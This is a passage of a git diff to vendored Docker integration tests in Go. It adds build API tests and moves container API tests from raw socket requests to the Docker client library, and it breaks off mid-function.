c.Assert(tw.Close(), checker.IsNil) - res, body, err := sockRequestRaw("POST", "/build", buffer, "application/x-tar") + res, body, err := request.Post("/build", request.RawContent(ioutil.NopCloser(buffer)), request.ContentType("application/x-tar")) c.Assert(err, checker.IsNil) c.Assert(res.StatusCode, checker.Equals, http.StatusOK) - out, err := readBody(body) + out, err := request.ReadBody(body) c.Assert(err, checker.IsNil) lines := strings.Split(string(out), "\n") c.Assert(len(lines), checker.GreaterThan, 1) @@ -252,3 +256,303 @@ func (s *DockerSuite) TestBuildAPIUnnormalizedTarPaths(c *check.C) { c.Assert(imageA, checker.Not(checker.Equals), imageB) } + +func (s *DockerSuite) TestBuildOnBuildWithCopy(c *check.C) { + dockerfile := ` + FROM ` + minimalBaseImage() + ` as onbuildbase + ONBUILD COPY file /file + + FROM onbuildbase + ` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFile("file", "some content"), + ) + defer ctx.Close() + + res, body, err := request.Post( + "/build", + request.RawContent(ctx.AsTarReader(c)), + request.ContentType("application/x-tar")) + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + + out, err := request.ReadBody(body) + c.Assert(err, checker.IsNil) + c.Assert(string(out), checker.Contains, "Successfully built") +} + +func (s *DockerSuite) TestBuildOnBuildCache(c *check.C) { + build := func(dockerfile string) []byte { + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + ) + defer ctx.Close() + + res, body, err := request.Post( + "/build", + request.RawContent(ctx.AsTarReader(c)), + request.ContentType("application/x-tar")) + assert.NilError(c, err) + assert.Check(c, is.DeepEqual(http.StatusOK, res.StatusCode)) + + out, err := request.ReadBody(body) + assert.NilError(c, err) + assert.Check(c, is.Contains(string(out), "Successfully built")) + return out + } + + dockerfile := ` + FROM ` + minimalBaseImage() + ` as onbuildbase + ENV something=bar + ONBUILD ENV foo=bar + ` + build(dockerfile) + + dockerfile += "FROM onbuildbase" + out := build(dockerfile) + + imageIDs := getImageIDsFromBuild(c, out) + assert.Check(c, is.Len(imageIDs, 2)) + parentID, childID := imageIDs[0], imageIDs[1] + + client := testEnv.APIClient() + + // check parentID is correct + image, _, err := client.ImageInspectWithRaw(context.Background(), childID) + assert.NilError(c, err) + assert.Check(c, is.Equal(parentID, image.Parent)) +} + +func (s *DockerRegistrySuite) TestBuildCopyFromForcePull(c *check.C) { + client := testEnv.APIClient() + + repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) + // tag the image to upload it to the private registry + err := client.ImageTag(context.TODO(), "busybox", repoName) + assert.Check(c, err) + // push the image to the registry + rc, err := client.ImagePush(context.TODO(), repoName, types.ImagePushOptions{RegistryAuth: "{}"}) + assert.Check(c, err) + _, err = io.Copy(ioutil.Discard, rc) + assert.Check(c, err) + + dockerfile := fmt.Sprintf(` + FROM %s AS foo + RUN touch abc + FROM %s + COPY --from=foo /abc / + `, repoName, repoName) + + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + ) + defer ctx.Close() + + res, body, err := request.Post( + "/build?pull=1", + request.RawContent(ctx.AsTarReader(c)), + request.ContentType("application/x-tar")) + assert.NilError(c, err) + assert.Check(c, is.DeepEqual(http.StatusOK, res.StatusCode)) + + out, err := request.ReadBody(body) + assert.NilError(c, err) + assert.Check(c, is.Contains(string(out), "Successfully built")) +} + +func (s *DockerSuite) TestBuildAddRemoteNoDecompress(c *check.C) { + buffer := new(bytes.Buffer) + tw := tar.NewWriter(buffer) + dt := []byte("contents") + err := tw.WriteHeader(&tar.Header{ + Name: "foo", + Size: int64(len(dt)), + Mode: 0600, + Typeflag: tar.TypeReg, + }) + assert.NilError(c, err) + _, err = tw.Write(dt) + assert.NilError(c, err) + err = tw.Close() + assert.NilError(c, err) + + server := fakestorage.New(c, "", fakecontext.WithBinaryFiles(map[string]*bytes.Buffer{ + "test.tar": buffer, + })) + defer server.Close() + + dockerfile := fmt.Sprintf(` + FROM busybox + ADD %s/test.tar / + RUN [ -f test.tar ] + `, server.URL()) + + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + ) + defer ctx.Close() + + res, body, err := request.Post( + "/build", + request.RawContent(ctx.AsTarReader(c)), + request.ContentType("application/x-tar")) + assert.NilError(c, err) + assert.Check(c, is.DeepEqual(http.StatusOK, res.StatusCode)) + + out, err := request.ReadBody(body) + assert.NilError(c, err) + assert.Check(c, is.Contains(string(out), "Successfully built")) +} + +func (s *DockerSuite) TestBuildChownOnCopy(c *check.C) { + // new feature added in 1.31 - https://github.com/moby/moby/pull/34263 + testRequires(c, DaemonIsLinux, MinimumAPIVersion("1.31")) + dockerfile := `FROM busybox + RUN echo 'test1:x:1001:1001::/bin:/bin/false' >> /etc/passwd + RUN echo 'test1:x:1001:' >> /etc/group + RUN echo 'test2:x:1002:' >> /etc/group + COPY --chown=test1:1002 . /new_dir + RUN ls -l / + RUN [ $(ls -l / | grep new_dir | awk '{print $3":"$4}') = 'test1:test2' ] + RUN [ $(ls -nl / | grep new_dir | awk '{print $3":"$4}') = '1001:1002' ] + ` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFile("test_file1", "some test content"), + ) + defer ctx.Close() + + res, body, err := request.Post( + "/build", + request.RawContent(ctx.AsTarReader(c)), + request.ContentType("application/x-tar")) + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + + out, err := request.ReadBody(body) + assert.NilError(c, err) + assert.Check(c, is.Contains(string(out), "Successfully built")) +} + +func (s *DockerSuite) TestBuildCopyCacheOnFileChange(c *check.C) { + + dockerfile := `FROM busybox +COPY file /file` + + ctx1 := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFile("file", "foo")) + ctx2 := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFile("file", "bar")) + + var build = func(ctx *fakecontext.Fake) string { + res, body, err := request.Post("/build", + request.RawContent(ctx.AsTarReader(c)), + request.ContentType("application/x-tar")) + + assert.NilError(c, err) + assert.Check(c, is.DeepEqual(http.StatusOK, res.StatusCode)) + + out, err := request.ReadBody(body) + assert.NilError(c, err) + + ids := getImageIDsFromBuild(c, out) + return ids[len(ids)-1] + } + + id1 := build(ctx1) + id2 := build(ctx1) + id3 := build(ctx2) + + if id1 != id2 { + c.Fatal("didn't use the cache") + } + if id1 == id3 { + c.Fatal("COPY With different source file should not share same cache") + } +} + +func (s *DockerSuite) TestBuildAddCacheOnFileChange(c *check.C) { + + dockerfile := `FROM busybox +ADD file /file` + + ctx1 := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFile("file", "foo")) + ctx2 := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFile("file", "bar")) + + var build = func(ctx *fakecontext.Fake) string { + res, body, err := request.Post("/build", + request.RawContent(ctx.AsTarReader(c)), + request.ContentType("application/x-tar")) + + assert.NilError(c, err) + assert.Check(c, is.DeepEqual(http.StatusOK, res.StatusCode)) + + out, err := request.ReadBody(body) + assert.NilError(c, err) + + ids := getImageIDsFromBuild(c, out) + return ids[len(ids)-1] + } + + id1 := build(ctx1) + id2 := build(ctx1) + id3 := build(ctx2) + + if id1 != id2 { + c.Fatal("didn't use the cache") + } + if id1 == id3 { + c.Fatal("COPY With different source file should not share same cache") + } +} + +func (s *DockerSuite) TestBuildScratchCopy(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerfile := `FROM scratch +ADD Dockerfile / +ENV foo bar` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + ) + defer ctx.Close() + + res, body, err := request.Post( + "/build", + request.RawContent(ctx.AsTarReader(c)), + request.ContentType("application/x-tar")) + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + + out, err := request.ReadBody(body) + assert.NilError(c, err) + assert.Check(c, is.Contains(string(out), "Successfully built")) +} + +type buildLine struct { + Stream string + Aux struct { + ID string + } +} + +func getImageIDsFromBuild(c *check.C, output []byte) []string { + var ids []string + for _, line := range bytes.Split(output, []byte("\n")) { + if len(line) == 0 { + continue + } + entry := buildLine{} + assert.NilError(c, json.Unmarshal(line, &entry)) + if entry.Aux.ID != "" { + ids = append(ids, entry.Aux.ID) + } + } + return ids +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_build_windows_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_build_windows_test.go new file mode 100644 index 0000000000..a605c5be39 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_build_windows_test.go @@ -0,0 +1,39 @@ +// +build windows + +package main + +import ( + "net/http" + + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/internal/test/fakecontext" + "github.com/docker/docker/internal/test/request" + "github.com/go-check/check" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func (s *DockerSuite) TestBuildWithRecycleBin(c *check.C) { + testRequires(c, DaemonIsWindows) + + dockerfile := "" + + "FROM " + testEnv.PlatformDefaults.BaseImage + "\n" + + "RUN md $REcycLE.biN && md missing\n" + + "RUN dir $Recycle.Bin && exit 1 || exit 0\n" + + "RUN dir missing\n" + + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(dockerfile)) + defer ctx.Close() + + res, body, err := request.Post( + "/build", + request.RawContent(ctx.AsTarReader(c)), + request.ContentType("application/x-tar")) + + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + + out, err := request.ReadBody(body) + assert.NilError(c, err) + assert.Check(c, is.Contains(string(out), "Successfully built")) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_containers_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_containers_test.go index d046ec0684..e8e47bd8b1 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_containers_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_containers_test.go @@ -3,16 +3,16 @@ package main import ( "archive/tar" "bytes" + "context" "encoding/json" "fmt" "io" "io/ioutil" "net/http" - "net/http/httputil" - "net/url" "os" "path/filepath" "regexp" + "runtime" "strconv" "strings" "time" @@ -21,51 +21,64 @@ import ( containertypes "github.com/docker/docker/api/types/container" mounttypes "github.com/docker/docker/api/types/mount" networktypes "github.com/docker/docker/api/types/network" - "github.com/docker/docker/pkg/integration" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" + "github.com/docker/docker/internal/test/request" "github.com/docker/docker/pkg/ioutils" "github.com/docker/docker/pkg/mount" "github.com/docker/docker/pkg/stringid" "github.com/docker/docker/volume" + "github.com/docker/go-connections/nat" "github.com/go-check/check" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/poll" ) func (s *DockerSuite) TestContainerAPIGetAll(c *check.C) { - startCount, err := getContainerCount() - c.Assert(err, checker.IsNil, check.Commentf("Cannot query container count")) - + startCount := getContainerCount(c) name := "getall" dockerCmd(c, "run", "--name", name, "busybox", "true") - status, body, err := sockRequest("GET", "/containers/json?all=1", nil) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) + defer cli.Close() - var inspectJSON []struct { - Names []string + options := types.ContainerListOptions{ + All: true, } - err = json.Unmarshal(body, &inspectJSON) - c.Assert(err, checker.IsNil, check.Commentf("unable to unmarshal response body")) - - c.Assert(inspectJSON, checker.HasLen, startCount+1) - - actual := inspectJSON[0].Names[0] + containers, err := cli.ContainerList(context.Background(), options) + c.Assert(err, checker.IsNil) + c.Assert(containers, checker.HasLen, startCount+1) + actual := containers[0].Names[0] c.Assert(actual, checker.Equals, "/"+name) } // regression test for empty json field being omitted #13691 func (s *DockerSuite) TestContainerAPIGetJSONNoFieldsOmitted(c *check.C) { + startCount := getContainerCount(c) dockerCmd(c, "run", "busybox", "true") - status, body, err := sockRequest("GET", "/containers/json?all=1", nil) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + options := types.ContainerListOptions{ + All: true, + } + containers, err := cli.ContainerList(context.Background(), options) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) + c.Assert(containers, checker.HasLen, startCount+1) + actual := fmt.Sprintf("%+v", containers[0]) // empty Labels field triggered this bug, make sense to check for everything // cause even Ports for instance can trigger this bug // better safe than sorry.. fields := []string{ - "Id", + "ID", "Names", "Image", "Command", @@ -79,7 +92,7 @@ func (s *DockerSuite) TestContainerAPIGetJSONNoFieldsOmitted(c *check.C) { // decoding into types.Container do not work since it eventually unmarshal // and empty field to an empty go map, so we just check for a string for _, f := range fields { - if !strings.Contains(string(body), f) { + if !strings.Contains(actual, f) { c.Fatalf("Field %s is missing and it shouldn't", f) } } @@ -87,7 +100,7 @@ func (s *DockerSuite) TestContainerAPIGetJSONNoFieldsOmitted(c *check.C) { type containerPs struct { Names []string - Ports []map[string]interface{} + Ports []types.Port } // regression test for non-empty fields from #13901 @@ -98,30 +111,30 @@ func (s *DockerSuite) TestContainerAPIPsOmitFields(c *check.C) { port := 80 runSleepingContainer(c, "--name", name, "--expose", strconv.Itoa(port)) - status, body, err := sockRequest("GET", "/containers/json?all=1", nil) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) + defer cli.Close() - var resp []containerPs - err = json.Unmarshal(body, &resp) + options := types.ContainerListOptions{ + All: true, + } + containers, err := cli.ContainerList(context.Background(), options) c.Assert(err, checker.IsNil) - - var foundContainer *containerPs - for _, container := range resp { - for _, testName := range container.Names { + var foundContainer containerPs + for _, c := range containers { + for _, testName := range c.Names { if "/"+name == testName { - foundContainer = &container + foundContainer.Names = c.Names + foundContainer.Ports = c.Ports break } } } c.Assert(foundContainer.Ports, checker.HasLen, 1) - c.Assert(foundContainer.Ports[0]["PrivatePort"], checker.Equals, float64(port)) - _, ok := foundContainer.Ports[0]["PublicPort"] - c.Assert(ok, checker.Not(checker.Equals), true) - _, ok = foundContainer.Ports[0]["IP"] - c.Assert(ok, checker.Not(checker.Equals), true) + c.Assert(foundContainer.Ports[0].PrivatePort, checker.Equals, uint16(port)) + c.Assert(foundContainer.Ports[0].PublicPort, checker.NotNil) + c.Assert(foundContainer.Ports[0].IP, checker.NotNil) } func (s *DockerSuite) TestContainerAPIGetExport(c *check.C) { @@ -130,12 +143,15 @@ func (s *DockerSuite) TestContainerAPIGetExport(c *check.C) { name := "exportcontainer" dockerCmd(c, "run", "--name", name, "busybox", "touch", "/test") - status, body, err := sockRequest("GET", "/containers/"+name+"/export", nil) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) + defer cli.Close() + body, err := cli.ContainerExport(context.Background(), name) + c.Assert(err, checker.IsNil) + defer body.Close() found := false - for tarReader := tar.NewReader(bytes.NewReader(body)); ; { + for tarReader := tar.NewReader(body); ; { h, err := tarReader.Next() if err != nil && err == io.EOF { break @@ -154,15 +170,12 @@ func (s *DockerSuite) TestContainerAPIGetChanges(c *check.C) { name := "changescontainer" dockerCmd(c, "run", "--name", name, "busybox", "rm", "/etc/passwd") - status, body, err := sockRequest("GET", "/containers/"+name+"/changes", nil) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) + defer cli.Close() - changes := []struct { - Kind int - Path string - }{} - c.Assert(json.Unmarshal(body, &changes), checker.IsNil, check.Commentf("unable to unmarshal response body")) + changes, err := cli.ContainerDiff(context.Background(), name) + c.Assert(err, checker.IsNil) // Check the changelog for removal of /etc/passwd success := false @@ -181,14 +194,19 @@ func (s *DockerSuite) TestGetContainerStats(c *check.C) { runSleepingContainer(c, "--name", name) type b struct { - status int - body []byte - err error + stats types.ContainerStats + err error } + bc := make(chan b, 1) go func() { - status, body, err := sockRequest("GET", "/containers/"+name+"/stats", nil) - bc <- b{status, body, err} + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + stats, err := cli.ContainerStats(context.Background(), name, true) + c.Assert(err, checker.IsNil) + bc <- b{stats, err} }() // allow some time to stream the stats from the container @@ -201,10 +219,8 @@ func (s *DockerSuite) TestGetContainerStats(c *check.C) { case <-time.After(2 * time.Second): c.Fatal("stream was not closed after container was removed") case sr := <-bc: - c.Assert(sr.err, checker.IsNil) - c.Assert(sr.status, checker.Equals, http.StatusOK) - - dec := json.NewDecoder(bytes.NewBuffer(sr.body)) + dec := json.NewDecoder(sr.stats.Body) + defer sr.stats.Body.Close() var s *types.Stats // decode only one object from the stream c.Assert(dec.Decode(&s), checker.IsNil) @@ -212,19 +228,23 @@ func (s *DockerSuite) TestGetContainerStats(c *check.C) { } func (s *DockerSuite) TestGetContainerStatsRmRunning(c *check.C) { - out, _ := runSleepingContainer(c) + out := runSleepingContainer(c) id := strings.TrimSpace(out) - buf := &integration.ChannelBuffer{make(chan []byte, 1)} + buf := &ChannelBuffer{C: make(chan []byte, 1)} defer buf.Close() - _, body, err := sockRequestRaw("GET", "/containers/"+id+"/stats?stream=1", nil, "application/json") + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - defer body.Close() + defer cli.Close() + + stats, err := cli.ContainerStats(context.Background(), id, true) + c.Assert(err, checker.IsNil) + defer stats.Body.Close() chErr := make(chan error, 1) go func() { - _, err = io.Copy(buf, body) + _, err = io.Copy(buf, stats.Body) chErr <- err }() @@ -243,6 +263,34 @@ func (s *DockerSuite) TestGetContainerStatsRmRunning(c *check.C) { c.Assert(<-chErr, checker.IsNil) } +// ChannelBuffer holds a chan of byte array that can be populate in a goroutine. +type ChannelBuffer struct { + C chan []byte +} + +// Write implements Writer. +func (c *ChannelBuffer) Write(b []byte) (int, error) { + c.C <- b + return len(b), nil +} + +// Close closes the go channel. +func (c *ChannelBuffer) Close() error { + close(c.C) + return nil +} + +// ReadTimeout reads the content of the channel in the specified byte array with +// the specified duration as timeout. +func (c *ChannelBuffer) ReadTimeout(p []byte, n time.Duration) (int, error) { + select { + case b := <-c.C: + return copy(p[0:], b), nil + case <-time.After(n): + return -1, fmt.Errorf("timeout reading from channel") + } +} + // regression test for gh13421 // previous test was just checking one stat entry so it didn't fail (stats with // stream false always return one stat) @@ -251,14 +299,19 @@ func (s *DockerSuite) TestGetContainerStatsStream(c *check.C) { runSleepingContainer(c, "--name", name) type b struct { - status int - body []byte - err error + stats types.ContainerStats + err error } + bc := make(chan b, 1) go func() { - status, body, err := sockRequest("GET", "/containers/"+name+"/stats", nil) - bc <- b{status, body, err} + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + stats, err := cli.ContainerStats(context.Background(), name, true) + c.Assert(err, checker.IsNil) + bc <- b{stats, err} }() // allow some time to stream the stats from the container @@ -271,10 +324,10 @@ func (s *DockerSuite) TestGetContainerStatsStream(c *check.C) { case <-time.After(2 * time.Second): c.Fatal("stream was not closed after container was removed") case sr := <-bc: - c.Assert(sr.err, checker.IsNil) - c.Assert(sr.status, checker.Equals, http.StatusOK) - - s := string(sr.body) + b, err := ioutil.ReadAll(sr.stats.Body) + defer sr.stats.Body.Close() + c.Assert(err, checker.IsNil) + s := string(b) // count occurrences of "read" of types.Stats if l := strings.Count(s, "read"); l < 2 { c.Fatalf("Expected more than one stat streamed, got %d", l) @@ -287,14 +340,20 @@ func (s *DockerSuite) TestGetContainerStatsNoStream(c *check.C) { runSleepingContainer(c, "--name", name) type b struct { - status int - body []byte - err error + stats types.ContainerStats + err error } + bc := make(chan b, 1) + go func() { - status, body, err := sockRequest("GET", "/containers/"+name+"/stats?stream=0", nil) - bc <- b{status, body, err} + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + stats, err := cli.ContainerStats(context.Background(), name, false) + c.Assert(err, checker.IsNil) + bc <- b{stats, err} }() // allow some time to stream the stats from the container @@ -307,10 +366,10 @@ func (s *DockerSuite) TestGetContainerStatsNoStream(c *check.C) { case <-time.After(2 * time.Second): c.Fatal("stream was not closed after container was removed") case sr := <-bc: - c.Assert(sr.err, checker.IsNil) - c.Assert(sr.status, checker.Equals, http.StatusOK) - - s := string(sr.body) + b, err := ioutil.ReadAll(sr.stats.Body) + defer sr.stats.Body.Close() + c.Assert(err, checker.IsNil) + s := string(b) // count occurrences of `"read"` of types.Stats c.Assert(strings.Count(s, `"read"`), checker.Equals, 1, check.Commentf("Expected only one stat streamed, got %d", strings.Count(s, `"read"`))) } @@ -320,24 +379,23 @@ func (s *DockerSuite) TestGetStoppedContainerStats(c *check.C) { name := "statscontainer" dockerCmd(c, "create", "--name", name, "busybox", "ps") - type stats struct { - status int - err error - } - chResp := make(chan stats) + chResp := make(chan error) // We expect an immediate response, but if it's not immediate, the test would hang, so put it in a goroutine // below we'll check this on a timeout. go func() { - resp, body, err := sockRequestRaw("GET", "/containers/"+name+"/stats", nil, "") - body.Close() - chResp <- stats{resp.StatusCode, err} + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + resp, err := cli.ContainerStats(context.Background(), name, false) + defer resp.Body.Close() + chResp <- err }() select { - case r := <-chResp: - c.Assert(r.err, checker.IsNil) - c.Assert(r.status, checker.Equals, http.StatusOK) + case err := <-chResp: + c.Assert(err, checker.IsNil) case <-time.After(10 * time.Second): c.Fatal("timeout waiting for stats response for stopped container") } @@ -346,28 +404,32 @@ func (s *DockerSuite) TestGetStoppedContainerStats(c *check.C) { func (s *DockerSuite) TestContainerAPIPause(c *check.C) { // Problematic on Windows as Windows does not support pause testRequires(c, DaemonIsLinux) - defer unpauseAllContainers() - out, _ := dockerCmd(c, "run", "-d", "busybox", "sleep", "30") + + getPaused := func(c *check.C) []string { + return strings.Fields(cli.DockerCmd(c, "ps", "-f", "status=paused", "-q", "-a").Combined()) + } + + out := cli.DockerCmd(c, "run", "-d", "busybox", "sleep", "30").Combined() ContainerID := strings.TrimSpace(out) - status, _, err := sockRequest("POST", "/containers/"+ContainerID+"/pause", nil) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + err = cli.ContainerPause(context.Background(), ContainerID) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNoContent) - pausedContainers, err := getSliceOfPausedContainers() - c.Assert(err, checker.IsNil, check.Commentf("error thrown while checking if containers were paused")) + pausedContainers := getPaused(c) if len(pausedContainers) != 1 || stringid.TruncateID(ContainerID) != pausedContainers[0] { c.Fatalf("there should be one paused container and not %d", len(pausedContainers)) } - status, _, err = sockRequest("POST", "/containers/"+ContainerID+"/unpause", nil) + err = cli.ContainerUnpause(context.Background(), ContainerID) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNoContent) - pausedContainers, err = getSliceOfPausedContainers() - c.Assert(err, checker.IsNil, check.Commentf("error thrown while checking if containers were paused")) - c.Assert(pausedContainers, checker.IsNil, check.Commentf("There should be no paused container.")) + pausedContainers = getPaused(c) + c.Assert(pausedContainers, checker.HasLen, 0, check.Commentf("There should be no paused container.")) } func (s *DockerSuite) TestContainerAPITop(c *check.C) { @@ -376,15 +438,13 @@ func (s *DockerSuite) TestContainerAPITop(c *check.C) { id := strings.TrimSpace(string(out)) c.Assert(waitRun(id), checker.IsNil) - type topResp struct { - Titles []string - Processes [][]string - } - var top topResp - status, b, err := sockRequest("GET", "/containers/"+id+"/top?ps_args=aux", nil) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + // sort by comm[andline] to make sure order stays the same in case of PID rollover + top, err := cli.ContainerTop(context.Background(), id, []string{"aux", "--sort=comm"}) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) - c.Assert(json.Unmarshal(b, &top), checker.IsNil) c.Assert(top.Titles, checker.HasLen, 11, check.Commentf("expected 11 titles, found %d: %v", len(top.Titles), top.Titles)) if top.Titles[0] != "USER" || top.Titles[10] != "COMMAND" { @@ -397,19 +457,16 @@ func (s *DockerSuite) TestContainerAPITop(c *check.C) { func (s *DockerSuite) TestContainerAPITopWindows(c *check.C) { testRequires(c, DaemonIsWindows) - out, _ := runSleepingContainer(c, "-d") + out := runSleepingContainer(c, "-d") id := strings.TrimSpace(string(out)) c.Assert(waitRun(id), checker.IsNil) - type topResp struct { - Titles []string - Processes [][]string - } - var top topResp - status, b, err := sockRequest("GET", "/containers/"+id+"/top", nil) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + top, err := cli.ContainerTop(context.Background(), id, nil) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) - c.Assert(json.Unmarshal(b, &top), checker.IsNil) c.Assert(top.Titles, checker.HasLen, 4, check.Commentf("expected 4 titles, found %d: %v", len(top.Titles), top.Titles)) if top.Titles[0] != "Name" || top.Titles[3] != "Private Working Set" { @@ -433,16 +490,16 @@ func (s *DockerSuite) TestContainerAPICommit(c *check.C) { cName := "testapicommit" dockerCmd(c, "run", "--name="+cName, "busybox", "/bin/sh", "-c", "touch /test") - name := "testcontainerapicommit" - status, b, err := sockRequest("POST", "/commit?repo="+name+"&testtag=tag&container="+cName, nil) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) + defer cli.Close() - type resp struct { - ID string + options := types.ContainerCommitOptions{ + Reference: "testcontainerapicommit:testtag", } - var img resp - c.Assert(json.Unmarshal(b, &img), checker.IsNil) + + img, err := cli.ContainerCommit(context.Background(), cName, options) + c.Assert(err, checker.IsNil) cmd := inspectField(c, img.ID, "Config.Cmd") c.Assert(cmd, checker.Equals, "[/bin/sh -c touch /test]", check.Commentf("got wrong Cmd from commit: %q", cmd)) @@ -455,20 +512,20 @@ func (s *DockerSuite) TestContainerAPICommitWithLabelInConfig(c *check.C) { cName := "testapicommitwithconfig" dockerCmd(c, "run", "--name="+cName, "busybox", "/bin/sh", "-c", "touch /test") - config := map[string]interface{}{ - "Labels": map[string]string{"key1": "value1", "key2": "value2"}, - } - - name := "testcontainerapicommitwithconfig" - status, b, err := sockRequest("POST", "/commit?repo="+name+"&container="+cName, config) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) + defer cli.Close() - type resp struct { - ID string + config := containertypes.Config{ + Labels: map[string]string{"key1": "value1", "key2": "value2"}} + + options := types.ContainerCommitOptions{ + Reference: "testcontainerapicommitwithconfig", + Config: &config, } - var img resp - c.Assert(json.Unmarshal(b, &img), checker.IsNil) + + img, err := cli.ContainerCommit(context.Background(), cName, options) + c.Assert(err, checker.IsNil) label1 := inspectFieldMap(c, img.ID, "Config.Labels", "key1") c.Assert(label1, checker.Equals, "value1") @@ -486,76 +543,79 @@ func (s *DockerSuite) TestContainerAPICommitWithLabelInConfig(c *check.C) { func (s *DockerSuite) TestContainerAPIBadPort(c *check.C) { // TODO Windows to Windows CI - Port this test testRequires(c, DaemonIsLinux) - config := map[string]interface{}{ - "Image": "busybox", - "Cmd": []string{"/bin/sh", "-c", "echo test"}, - "PortBindings": map[string]interface{}{ - "8080/tcp": []map[string]interface{}{ + + config := containertypes.Config{ + Image: "busybox", + Cmd: []string{"/bin/sh", "-c", "echo test"}, + } + + hostConfig := containertypes.HostConfig{ + PortBindings: nat.PortMap{ + "8080/tcp": []nat.PortBinding{ { - "HostIP": "", - "HostPort": "aa80", - }, + HostIP: "", + HostPort: "aa80"}, }, }, } - jsonData := bytes.NewBuffer(nil) - json.NewEncoder(jsonData).Encode(config) - - status, body, err := sockRequest("POST", "/containers/create", config) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusInternalServerError) - c.Assert(getErrorMessage(c, body), checker.Equals, `invalid port specification: "aa80"`, check.Commentf("Incorrect error msg: %s", body)) + defer cli.Close() + + _, err = cli.ContainerCreate(context.Background(), &config, &hostConfig, &networktypes.NetworkingConfig{}, "") + c.Assert(err.Error(), checker.Contains, `invalid port specification: "aa80"`) } func (s *DockerSuite) TestContainerAPICreate(c *check.C) { - config := map[string]interface{}{ - "Image": "busybox", - "Cmd": []string{"/bin/sh", "-c", "touch /test && ls /test"}, + config := containertypes.Config{ + Image: "busybox", + Cmd: []string{"/bin/sh", "-c", "touch /test && ls /test"}, } - status, b, err := sockRequest("POST", "/containers/create", config) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) + defer cli.Close() - type createResp struct { - ID string - } - var container createResp - c.Assert(json.Unmarshal(b, &container), checker.IsNil) + container, err := cli.ContainerCreate(context.Background(), &config, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, "") + c.Assert(err, checker.IsNil) out, _ := dockerCmd(c, "start", "-a", container.ID) c.Assert(strings.TrimSpace(out), checker.Equals, "/test") } func (s *DockerSuite) TestContainerAPICreateEmptyConfig(c *check.C) { - config := map[string]interface{}{} - status, body, err := sockRequest("POST", "/containers/create", config) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusInternalServerError) + defer cli.Close() + + _, err = cli.ContainerCreate(context.Background(), &containertypes.Config{}, &containertypes.HostConfig{}, &networktypes.NetworkingConfig{}, "") - expected := "Config cannot be empty in order to create a container" - c.Assert(getErrorMessage(c, body), checker.Equals, expected) + expected := "No command specified" + c.Assert(err.Error(), checker.Contains, expected) } func (s *DockerSuite) 